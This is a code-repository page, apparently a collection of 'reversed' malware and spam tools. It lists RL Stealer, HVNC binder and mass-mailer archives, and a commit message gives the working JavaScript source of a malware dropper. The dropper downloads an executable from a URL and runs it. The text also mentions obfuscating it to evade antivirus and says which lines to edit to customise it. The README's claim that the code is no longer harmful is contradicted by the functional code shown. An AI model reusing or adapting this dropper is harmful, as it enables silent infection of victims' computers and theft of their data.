📁🔬 Source Codes from reversed projects
Find a file
bl4d3rvnner7 8048d11754
👨‍💻 Simple Malware JS Dropper Source Code 👨‍💻
🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.

1️⃣ Download Payload

The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).

var fileUrl = "https://url.com/windows.exe";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();

2️⃣ Save the Payload 

The script saves the downloaded file to a specific location on the user's file system, either in the temporary files directory or the application data directory.

var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();

3️⃣ Execute the Payload

After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:

➡️.jar files are run using java -jar.
➡️.vbs and .wsf files are run using wscript.
➡️Other file types are executed directly.

if (fileName.endsWith(".jar")) {
    shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
    shell.run("wscript \"" + fileName + "\"");
} else {
    shell.run("\"" + fileName + "\"");
}

🦅 To edit the script, edit line...

➡️ 10 for the fileName.
➡️ 11 for the fileUrl.
➡️ 12 for the useTempPath (using it would be "true" and doesn't need admin)
2025-05-18 01:42:29 +02:00
Bossam Mod Menu PC.gsc Create Bossam Mod Menu PC.gsc 2024-04-19 12:17:19 +02:00
BossamV6.gsc 🧿 BOSSAM V6 MOD MENU [BO2] 2023-06-18 16:14:13 +02:00
dropper.js 👨‍💻 Simple Malware JS Dropper Source Code 👨‍💻 2025-05-18 01:42:29 +02:00
Editify.zip 📝 EDIFIY - COMBO EDITOR 2023-06-18 16:12:21 +02:00
emailvalid.py 📧 Mail-Check 2023-06-18 16:10:15 +02:00
leafmailer2.8.php LEAF MAILER 2.8 SOURCE CODE 🍁 2025-05-18 01:40:35 +02:00
LEGION SMTP.zip 🤖 LEGION BOT V6.6 2023-06-18 16:03:23 +02:00
LuFix Mailer 1.0 by Scarletta.zip 📱Lufix Sender 1.0 Source Code [PHP] 2025-05-18 01:41:55 +02:00
README.md Update README.md 2023-06-18 15:59:11 +02:00
RedBinder.zip 🌊 HVNC Malware 2023-06-18 16:17:17 +02:00
RLStealer.zip 😈 RL Stealer Source Code 👩‍💻 2025-05-18 01:41:13 +02:00
VictorV2.zip 📧 VICTOR3 V2 SENDER 2023-06-18 16:08:15 +02:00

Project Source Codes 📁🔬

Welcome to the project source codes! This repository houses a collection of source code files that are meant to be shared with everyone. Whether you're a developer, a student, or simply curious about coding, you've come to the right place. 🌟👩‍💻👨‍💻

Contents 📚

  1. Description
  2. Getting Started
  3. Usage
  4. Contributing

Description 📝

The source code files in this repository cover a wide range of topics and programming languages. You'll find code examples, algorithms, and implementations that can serve as a valuable resource for learning and exploration. Feel free to browse through the files and delve into the exciting world of programming. 💻

Please note the following facts about this repository:

  • The repository will contain source codes only. 📄
  • The source codes provided here may have been malicious in the past, but they have been reversed and are no longer harmful. ⚠️🔍
  • I (bl4d3rvnner7) have personally reversed the codes. 🕵️‍♀️
  • I am not responsible for any misuse of the source codes. Please use them responsibly. 🚫
  • You are allowed to fork the repository and report any errors or issues by creating a new issue. 🍴🐛📝

Getting Started 🚀

To get started with the project source codes, simply clone or download the repository to your local machine. Make sure you have the necessary software and development environment set up for the specific programming language you wish to explore.

Usage 💡

The source code files are organized into folders based on their respective programming languages or topics. Navigate through the folders to find the specific code files you're interested in. Each file contains comments and instructions to guide you through its purpose and usage.

Feel free to experiment, modify, and build upon the existing code. Learning by doing is a great way to enhance your programming skills and creativity. 🧠💪

Contributing 🤝

Contributions to this repository are more than welcome! If you have your own code snippets, algorithms, or improvements to the existing code, feel free to submit a pull request. Together, we can create a rich and diverse collection of source code for the benefit of everyone.

Happy researching! 🎉👩‍💻👨‍💻